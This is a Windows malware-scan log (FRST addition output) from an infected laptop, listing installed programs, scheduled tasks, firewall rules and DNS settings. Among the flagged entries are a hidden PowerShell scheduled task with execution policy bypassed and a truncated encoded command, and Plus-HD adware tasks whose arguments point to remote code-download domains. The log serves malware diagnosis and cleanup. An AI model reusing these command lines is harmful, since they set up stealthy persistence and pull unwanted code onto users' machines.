Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.3.300.257 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.1.629 - Adobe Systems, Inc.)
Agatha Christie - Peril at End House (HKLM-x32\...\WTA-39699de3-e852-4297-a08f-f6825ed9204f) (Version: 2.2.0.95 - WildTangent) Hidden
ArcSoft Camera Suite (HKLM-x32\...\{A117C1DE-00F1-4634-A9A9-6E6FC70FBD4B}) (Version: 1.0.26.55 - ArcSoft) Hidden
ArcSoft Camera Suite (HKLM-x32\...\ArcSoft Camera Suite) (Version: 2.0.30.55 - ArcSoft)
ATI Catalyst Install Manager (HKLM\...\{E686FBB0-B356-96BE-A9ED-2D8286AA0386}) (Version: 3.0.829.0 - ATI Technologies, Inc.)
Bejeweled 3 (HKLM-x32\...\WTA-d33cd767-b556-40f2-a238-f02d68978ccf) (Version: 2.2.0.97 - WildTangent) Hidden
Bing Bar (HKLM-x32\...\{9FA13759-5C2B-4177-9DDC-0038F8B5BEFD}) (Version: 7.0.826.0 - Microsoft Corporation)
Blasterball 3 (HKLM-x32\...\WTA-6772263a-2b98-4066-a486-20d31078eeab) (Version: 2.2.0.97 - WildTangent) Hidden
Bounce Symphony (HKLM-x32\...\WTA-524e3c3c-a2c1-450c-b32c-9e98764606af) (Version: 2.2.0.97 - WildTangent) Hidden
Cake Mania (HKLM-x32\...\WTA-9c7f4afd-8fe9-4070-90e6-b799d43ac33c) (Version: 2.2.0.95 - WildTangent) Hidden
Chronicles of Albian (HKLM-x32\...\WTA-17b1000c-6ca2-4ca1-b7f5-65bfcdcd33f6) (Version: 2.2.0.95 - WildTangent) Hidden
Chuzzle Deluxe (HKLM-x32\...\WTA-06194e50-4e76-4538-8d54-edc77c478c42) (Version: 2.2.0.95 - WildTangent) Hidden
Cradle of Rome 2 (HKLM-x32\...\WTA-a22b7974-4a50-4b46-aa3f-f58481588045) (Version: 2.2.0.95 - WildTangent) Hidden
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DMUninstaller (HKLM-x32\...\DMUninstaller) (Version:  - ) <==== ATTENTION
Energy Star Digital Logo (HKLM-x32\...\{BD1A34C9-4764-4F79-AE1F-112F8C89D3D4}) (Version: 1.0.1 - Hewlett-Packard)
Evernote v. 4.2.3 (HKLM-x32\...\{F761359C-9CED-45AE-9A51-9D6605CD55C4}) (Version: 4.2.3.22 - Evernote Corp.)
Farm Frenzy (HKLM-x32\...\WTA-55d3dd79-09f3-4488-9339-11d2f1eb9493) (Version: 2.2.0.95 - WildTangent) Hidden
FATE (HKLM-x32\...\WTA-45bfd237-b808-4567-a7c2-893735e60c95) (Version: 2.2.0.97 - WildTangent) Hidden
Galería fotográfica de Windows Live (HKLM-x32\...\{E85A4EFC-82F2-4CEE-8A8E-62FDAD353A66}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galeria fotogràfica del Windows Live (HKLM-x32\...\{4736B0ED-F6A1-48EC-A1B7-C053027648F1}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galerie de photos Windows Live (HKLM-x32\...\{488F0347-C4A7-4374-91A7-30818BEDA710}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Google Chrome (HKU\S-1-5-21-893956484-597186715-3571521862-1000\...\Google Chrome) (Version: 31.0.1650.63 - Google Inc.)
Governor of Poker 2 Premium Edition (HKLM-x32\...\WTA-7ec050fb-85bf-473f-afe5-7b8ce16c4e83) (Version: 2.2.0.95 - WildTangent) Hidden
HP 3D DriveGuard (HKLM\...\{5601F151-A69F-4E30-8C60-37928124CD07}) (Version: 4.1.9.1 - Hewlett-Packard Company)
HP Documentation (HKLM-x32\...\{9F0019B0-8C1A-4B1E-8381-E9D9B41079DE}) (Version: 1.1.0.0 - Hewlett-Packard)
HP ESU for Microsoft Windows 7 (HKLM-x32\...\{A6365256-0FBA-4DCD-88CE-D92A4DC9328E}) (Version: 2.0.1.1 - Hewlett-Packard Company)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.5 - WildTangent)
HP Mobile Broadband Drivers (HKLM-x32\...\{646E8C34-C88B-42F9-9F41-985A801219E1}) (Version: 7.0.0.4 - Ericsson AB)
HP On Screen Display (HKLM-x32\...\{ED1BD69A-07E3-418C-91F1-D856582581BF}) (Version: 1.3.5 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{285F722C-0E45-47DE-B38E-5B3B10FA4A7C}) (Version: 2.5.2 - Hewlett-Packard Company)
HP QuickWeb (HKLM-x32\...\{D6159AEF-32BD-4177-82AE-5ED1F0F0DC1D}) (Version: 3.1.1.10066 - Hewlett-Packard Company)
HP Setup (HKLM-x32\...\{03046EBB-CB7C-4B98-BEFB-690EB955DA22}) (Version: 8.5.4526.3645 - Hewlett-Packard Company)
HP SoftPaq Download Manager (HKLM-x32\...\{344A1AA2-AC8E-4741-BDB0-65B68FDA883C}) (Version: 3.2.0.0 - Hewlett-Packard Company)
HP Software Framework (HKLM-x32\...\{AF240B18-034B-4A82-B3FC-0B879C4BAE2E}) (Version: 4.5.1.1 - Hewlett-Packard Company)
HP Software Setup (HKLM-x32\...\{531000B3-DBEE-4115-BBF3-DA48B67C053F}) (Version: 8.2.1.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{EE202411-2C26-49E8-9784-1BC1DBF7DE96}) (Version: 7.0.39.15 - Hewlett-Packard Company)
HP System Default Settings (HKLM-x32\...\{D2A2E5CD-801A-4B8D-8119-F79449A09B67}) (Version: 2.3.1.2 - Hewlett-Packard Company)
HP Wallpaper (HKLM-x32\...\{11C9A461-DD9D-4C71-85A4-6DCE7F99CC44}) (Version: 2.01 - Hewlett-Packard Company)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6351.0 - IDT)
Intel® PROSet/Wireless for Bluetooth® 3.0 + High Speed (HKLM\...\{FE3DEA5D-60D7-4C92-A71F-1E1F2F4615FC}) (Version: 14.2.0.0216 - Intel Corporation)
Intel® PROSet/Wireless Software for Bluetooth® Technology (HKLM\...\{2ABA2E8D-23CF-418F-BC8F-2EC99FA51A3F}) (Version: 1.2.1.0608 - Intel Corporation)
Java™ 7 Update 4 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217004FF}) (Version: 7.0.40 - Oracle)
JavaFX 2.1.0 (HKLM-x32\...\{1111706F-666A-4037-7777-210328764D10}) (Version: 2.1.0 - Oracle Corporation)
Jewel Quest Solitaire (HKLM-x32\...\WTA-90b790ae-60c1-4b8e-9d1a-221a6b5af398) (Version: 2.2.0.95 - WildTangent) Hidden
Jewel Quest: The Sleepless Star - Collector's Edition (HKLM-x32\...\WTA-2293f013-c5bc-4dbb-b7df-1cadd5626988) (Version: 2.2.0.95 - WildTangent) Hidden
Juniper Networks Secure Application Manager (HKLM-x32\...\Neoteris_Secure_Application_Manager) (Version: 6.5.0.15551 - Juniper Networks)
Juniper Networks Setup Client (HKU\S-1-5-21-893956484-597186715-3571521862-1000\...\Juniper_Setup_Client) (Version: 2.1.3.6931 - Juniper Networks)
llEsss2pay (HKLM-x32\...\{82B558C7-2A69-D3D5-B65A-DCAB3B65AD02}) (Version:  - less2pay) <==== ATTENTION
Mah Jong Medley (HKLM-x32\...\WTA-cf9503ab-b1a9-492b-8a77-53a30506c510) (Version: 2.2.0.95 - WildTangent) Hidden
Malwarebytes Anti-Malware version 1.61.0.1400 (HKLM-x32\...\Malwarebytes' Anti-Malware_is1) (Version: 1.61.0.1400 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.5131.5000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.5.216.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30214.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft_VC90_CRT_x86 (HKLM-x32\...\{DF2035BE-5820-4965-BD97-7FAF8D4A7879}) (Version: 1.0.0 - Microsoft Corporation)
Mystery of Mortlake Mansion (HKLM-x32\...\WTA-20aa863f-fcff-417d-99e6-9144fd29dc7d) (Version: 2.2.0.97 - WildTangent) Hidden
Namco All-Stars: PAC-MAN (HKLM-x32\...\WTA-3213b3b7-4248-4bd8-8ac2-d3279716afa1) (Version: 2.2.0.95 - WildTangent) Hidden
PDF Complete Special Edition (HKLM-x32\...\PDF Complete) (Version: 4.0.64 - PDF Complete, Inc)
Penguins! (HKLM-x32\...\WTA-9def8145-5f3d-466d-8131-7f193b558514) (Version: 2.2.0.95 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (HKLM-x32\...\WTA-0e88edde-8fc4-4d0b-a821-44cd02ef058f) (Version: 2.2.0.95 - WildTangent) Hidden
Plus-HD-1.2 (HKLM-x32\...\Plus-HD-1.2) (Version: 1.32.153.0 - Plus HD) <==== ATTENTION
Polar Bowler (HKLM-x32\...\WTA-31d05db2-11b5-49d4-a9f0-934b3ce8def3) (Version: 2.2.0.97 - WildTangent) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.46.610.2011 - Realtek)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30127 - Realtek Semiconductor Corp.)
Slingo Deluxe (HKLM-x32\...\WTA-eb571057-e94a-4a0f-a40a-7d6027eb556a) (Version: 2.2.0.95 - WildTangent) Hidden
Software Version Updater (HKLM-x32\...\{99C91FC5-DB5B-4AA0-BB70-5D89C5A4DF96}) (Version: 112.47.14.333 - ) <==== ATTENTION
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics TouchPad Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.29.0 - Synaptics Incorporated)
Update Installer for WildTangent Games App (HKLM-x32\...\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App) (Version:  - WildTangent) Hidden
Vacation Quest - The Hawaiian Islands (HKLM-x32\...\WTA-ea42100f-4180-41d0-a91a-083e512f4f5c) (Version: 2.2.0.97 - WildTangent) Hidden
Virtual Villagers - The Secret City (HKLM-x32\...\WTA-22a3da39-09f8-46a4-b959-0b6c15cbc2aa) (Version: 2.2.0.95 - WildTangent) Hidden
WildTangent Games App (HP Games) (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-hp) (Version: 4.0.5.2 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
WinZip 15.0 (HKLM-x32\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240C1}) (Version: 15.0.9411 - WinZip Computing, S.L. )
WorkAssure - I & R for Windows 05.12.00 (HKLM-x32\...\{C65B4B79-7B57-4B05-99DF-528D27969684}) (Version: 05.12.00 - ARRIS)
Xobni Core (HKLM-x32\...\{8DC069E7-893C-41E1-9442-DE89FEC33371}) (Version: 1.0.0 - Xobni, Inc.) Hidden
Zuma Deluxe (HKLM-x32\...\WTA-3bc94b27-aef2-4ff6-9856-a013eff37fb8) (Version: 2.2.0.95 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-893956484-597186715-3571521862-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Tech 14\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-893956484-597186715-3571521862-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Tech 14\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll (Google Inc.)
ContextMenuHandlers1: [BTMSentToExt] -> {0A7D34C2-E9DA-48A1-9E34-0CDFC2DE3B44} => C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll [2011-10-18] (Intel Corporation)
ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2014-03-11] (Microsoft Corporation)
ContextMenuHandlers1: [WinZip] -> {E0D79304-84BE-11CE-9641-444553540000} => C:\Program Files (x86)\WinZip\wzshls64.dll [2011-03-02] (WinZip Computing, S.L.)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2014-03-11] (Microsoft Corporation)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamext.dll [2012-04-04] (Malwarebytes Corporation)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2014-03-11] (Microsoft Corporation)
ContextMenuHandlers4: [WinZip] -> {E0D79304-84BE-11CE-9641-444553540000} => C:\Program Files (x86)\WinZip\wzshls64.dll [2011-03-02] (WinZip Computing, S.L.)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\atiacm64.dll [2011-06-29] (Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamext.dll [2012-04-04] (Malwarebytes Corporation)
ContextMenuHandlers6: [WinZip] -> {E0D79304-84BE-11CE-9641-444553540000} => C:\Program Files (x86)\WinZip\wzshls64.dll [2011-03-02] (WinZip Computing, S.L.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {1A2237E1-06B9-473A-AA9F-0B71FBFE15B2} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {377FBCA9-E775-4F65-9277-ED0882D40ED0} - System32\Tasks\Plus-HD-1.2-updater => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-updater.exe [2013-12-22] (Plus HD)
Task: {63F10999-1085-44F5-92F4-00E3050A14A6} - System32\Tasks\Plus-HD-1.2-chromeinstaller => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-chromeinstaller.exe [2013-12-22] (Plus HD)
Task: {6A0BBF0A-DE94-41FE-9157-FF8D9970AB11} - System32\Tasks\Plus-HD-1.2-firefoxinstaller => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-firefoxinstaller.exe [2013-12-22] (Plus HD)
Task: {78A71E6E-B9EF-42C2-8A33-579D8F25CE03} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {83FFF528-C1BA-44DF-9067-A5A730D76391} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe
Task: {AA72BE28-D781-4FCA-A97F-27CAA5C4187D} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
Task: {BAE3B976-BA97-4A8A-9EC4-2A9569AA4CAE} - System32\Tasks\Plus-HD-1.2-codedownloader => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-codedownloader.exe [2013-12-22] (Plus HD)
Task: {C0AA07A6-9F7A-43C2-85BF-8063C3017983} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-893956484-597186715-3571521862-1000UA => C:\Users\Tech 14\AppData\Local\Google\Update\GoogleUpdate.exe [2012-06-15] (Google Inc.)
Task: {DD61A677-5F85-4AEB-B8BD-5317EC47C0C5} - System32\Tasks\{82E158D8-861E-4010-A444-A4549883AF54} => C:\windows\system32\pcalua.exe -a "C:\Users\Tech 14\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8VWGHUL4\PokerStarsInstallPM (2).exe" -d "C:\Users\Tech 14\Desktop"
Task: {E7F157B8-18FC-44F8-9362-7CF6F27B0696} - System32\Tasks\Plus-HD-1.2-enabler => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-enabler.exe [2013-12-22] (Plus HD)
Task: {F1CF095C-067C-4E96-8457-6FABD1C8EDE0} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-893956484-597186715-3571521862-1000Core => C:\Users\Tech 14\AppData\Local\Google\Update\GoogleUpdate.exe [2012-06-15] (Google Inc.)
Task: {FA3683F2-5F9B-47D0-889A-09D8BFDDF1BE} - System32\Tasks\{B68E879D-FE0E-7106-2643-B9053FB27FCC} => C:\windows\system32\WindowsPowershell\v1.0\powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand IAA7ADsAOwA7ACAAOwA7ADsAOwAgACAAOwA7ACAAIAAgADsAOwAgACAAOwAgADsAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIA (the data entry has 8028 more characters).
Task: {FA9233DD-423A-457F-BD31-003D43E5F021} - System32\Tasks\AmiUpdXp => C:\Users\Tech 14\AppData\Local\29033\Updater.exe [2016-07-17] (Emirates) <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\windows\Tasks\AmiUpdXp.job => C:\Users\Tech 14\AppData\Local\29033\Updater.exe <==== ATTENTION
Task: C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-893956484-597186715-3571521862-1000Core.job => C:\Users\Tech 14\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-893956484-597186715-3571521862-1000UA.job => C:\Users\Tech 14\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\Plus-HD-1.2-chromeinstaller.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-chromeinstaller.exe/installcrx /crxinstalltype=0 /agentregpath='Plus-HD-1.2' /extensionfilepath C:\Program Files (x86)\Plus-HD-1.2\31255.crx' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com <==== ATTENTION
Task: C:\windows\Tasks\Plus-HD-1.2-codedownloader.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-codedownloader.exeǀ/reinstallapp /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /codedownloaddomain=hxxp:/app-static.crossrider.com <==== ATTENTION
Task: C:\windows\Tasks\Plus-HD-1.2-enabler.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-enabler.exeƕ/enablebho /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com <==== ATTENTION
Task: C:\windows\Tasks\Plus-HD-1.2-firefoxinstaller.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-firefoxinstaller.exeͳ/installxpi /agentregpath='Plus-HD-1.2' /extensionfilepath C:\Program Files (x86)\Plus-HD-1.2\31255.xpi' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /waitforbrowser=300 /extensionid=39e612de-2951-40c2-ab4a-82e121c42778@4e0cecc2-7c67-4374-bc4c-f15656d80ab7.com /extensionversion=0.93 /prefsbranch=a39e612de295140c2ab4a82e121c427784e0cecc27c674374bc4cf15656d80ab7com31255 /updateurl=hxxps:/w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/31255.rdf <==== ATTENTION
Task: C:\windows\Tasks\Plus-HD-1.2-updater.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-updater.exeǸ/runupdater /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /geoserviceurl=hxxp:/ipgeoapi.com/ /updatejsondomain=hxxp:/update.srvstatsdata.com /updaterversion=2 /monetizationdomain=hxxp:/stats.syncstatsdata.com <==== ATTENTION

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


ShortcutWithArgument: C:\Users\Tech 14\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\500px.lnk -> C:\Users\Tech 14\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=egpociadnldbkfkjpmjoaibnbcoeplja
ShortcutWithArgument: C:\Users\Tech 14\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Any.do.lnk -> C:\Users\Tech 14\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=ocgddccilgpeepgglnlpchkpgamkgmld
ShortcutWithArgument: C:\Users\Tech 14\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\WeatherBug.lnk -> C:\Users\Tech 14\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=njkkjobcechefaoknodniidfjapgfoco
ShortcutWithArgument: C:\Users\Tech 14\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Wunderlist for Chrome.lnk -> C:\Users\Tech 14\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=ojcflmmmcfpacggndoaaflkmcoblhnbh

==================== Loaded Modules (Whitelisted) ==============

2011-06-29 02:38 - 2011-06-29 02:38 - 000243712 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2011-06-17 16:42 - 2011-06-17 16:42 - 000016384 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2012-04-06 04:50 - 2011-07-13 14:10 - 000065576 ____R () C:\Program Files (x86)\Ericsson\Mobile Broadband Drivers\WMCore\MBMDebug.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720 [126]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 22:34 - 2009-06-10 17:00 - 000000824 _____ C:\windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-893956484-597186715-3571521862-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Tech 14\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 199.203.131.151 - 82.163.143.181
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{84268F2A-B813-4F26-8863-5947EEF44252}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{79710AA8-74BB-437C-8546-897B52453C10}] => (Allow) LPort=2869
FirewallRules: [{F4C48E78-2D7C-452B-A575-20B782D7B05D}] => (Allow) LPort=1900
FirewallRules: [{A0FAE66D-E64C-4BDD-95A5-5B6F9F472D96}] => (Allow) C:\Users\Tech 14\AppData\Local\Temp\7zS4490.tmp\SymNRT.exe
FirewallRules: [{336AE294-5A9B-42ED-8C17-7D28ABE1F2EE}] => (Allow) C:\Users\Tech 14\AppData\Local\Temp\7zS4490.tmp\SymNRT.exe
FirewallRules: [TCP Query User{1A7AF002-4713-4AC3-9AFF-3DAD876B8A16}C:\program files (x86)\oovoo\oovoo.exe] => (Allow) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [UDP Query User{5972DF2D-415C-4DDB-AFE8-71F8557913F5}C:\program files (x86)\oovoo\oovoo.exe] => (Allow) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [{4A223AA7-6BFE-41D4-8115-498D3669643B}] => (Allow) LPort=443
FirewallRules: [{5B2CF182-BECC-4489-B189-B8AB940F4C2B}] => (Allow) LPort=443
FirewallRules: [{D34EF551-70D6-4F0D-95DB-8D59F4E67225}] => (Allow) LPort=37674
FirewallRules: [{43DA3EE4-36B5-4B8A-AC1D-5E7BF39752BE}] => (Allow) LPort=37674
FirewallRules: [{130D0186-8EF5-4DE7-B327-E79B83A602CB}] => (Allow) LPort=37675

==================== Restore Points =========================

22-04-2014 20:39:06 Windows Update
22-04-2014 21:47:24 Windows Update
25-04-2014 16:54:28 Windows Update
18-07-2016 19:25:45 Windows Update
18-07-2016 21:42:14 Windows Update
21-03-2018 12:22:00 Removed ooVoo
21-03-2018 13:09:09 Removed Skype™ 6.11

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (03/21/2018 11:03:06 PM) (Source: WinMgmt) (EventID: 10) (User: )
